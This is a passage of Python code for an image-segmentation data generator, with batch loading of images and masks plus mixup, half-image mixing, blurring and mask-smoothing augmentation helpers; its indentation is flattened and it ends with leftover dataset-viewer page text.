img_idx = self.imageName_to_imageIdx_dict[img_name]
img = self.images[img_idx]
if self.preproc_before_aug:
if self.preprocessing:
img = self.preprocessing(img)
img_type = img.dtype
#
X = np.empty((self.batch_size, *self.target_size, self.n_channels), dtype=img_type)
for i, ID in enumerate(list_IDs_batch):
img_name = self.dataframe['image'].loc[ID]
#img_path = self.directory + img_name
#img = cv2.imread(img_path)
#img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_idx = self.imageName_to_imageIdx_dict[img_name]
img = self.images[img_idx]
if self.preproc_before_aug:
if self.preprocessing:
img = self.preprocessing(img)
X[i,] = img
return X
def __generate_Y(self, list_IDs_batch):
Y = np.empty((self.batch_size, *self.target_size, self.n_classes), dtype=int)
for i, ID in enumerate(list_IDs_batch):
img_name = self.dataframe['image'].loc[ID]
#image_df = self.target_df[self.target_df['image'] == img_name]
#rles = image_df['EncodedPixels'].values
#masks = build_masks(rles, input_shape=self.mask_shape, reshape=self.target_size)
mask_idx = self.imageName_to_maskIdx_dict[img_name]
mask = self.masks[mask_idx]
Y[i, ] = mask
return Y
def __augment_batch(self, X_batch, Y_batch):
for i in range(X_batch.shape[0]):
X_batch[i, ], Y_batch[i, ] = self.__random_transform(X_batch[i, ], Y_batch[i, ])
return X_batch, Y_batch
def __random_transform(self, X, Y):
composed = self.augmentation(image=X, mask=Y)
X_aug = composed['image']
Y_aug = composed['mask']
return X_aug, Y_aug
def mixup(imgs, masks, alpha):
mixup_rate = np.random.beta(alpha, alpha, len(imgs))
def __mixup(rate, x):
rate_shape = list(x.shape)
for i in range(len(rate_shape)):
if i > 0:
rate_shape[i] = 1
rate_shape = tuple(rate_shape)
re_rate = rate.reshape(rate_shape)
mixup_idx = np.random.permutation(np.arange(len(x)))
mix_x = re_rate * x + (1.0 - re_rate) * x[mixup_idx]
return mix_x
mixed_imgs = __mixup(mixup_rate, imgs)
mixed_masks = __mixup(mixup_rate, masks)
return mixed_imgs, mixed_masks
def mixhalf(imgs, masks, p):
"""
Args:
imgs: shape = (B, H, W, Channel)
masks: shape = (B, H, W, Class)
"""
dev_w = int(imgs.shape[2] * 0.5)
mix_idx = np.random.permutation(np.arange(len(imgs)))
mix_imgs = imgs.copy()
mix_masks = masks.copy()
for i in range(len(imgs)):
if np.random.rand() < p:
mix_imgs[i] = np.concatenate([imgs[i,:,:dev_w,:], imgs[mix_idx[i],:,:dev_w,:]], axis=1)
mix_masks[i] = np.concatenate([masks[i,:,:dev_w,:], masks[mix_idx[i],:,:dev_w,:]], axis=1)
return mix_imgs, mix_masks
def average_filter(imgs, kernel_size):
filtered_imgs = np.zeros_like(imgs, dtype='float32')
for i, img in enumerate(imgs):
filtered_imgs[i] = cv2.blur(img.astype('float32'), (kernel_size, kernel_size))
return filtered_imgs
def smooth_overlap_mask_v1(masks, base_value):
resi_rate = masks / (np.sum(masks, axis=-1, keepdims=True) + 1e-5)
smooth_mask = base_value * masks + (1 - base_value) * masks * resi_rate
return smooth_mask
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.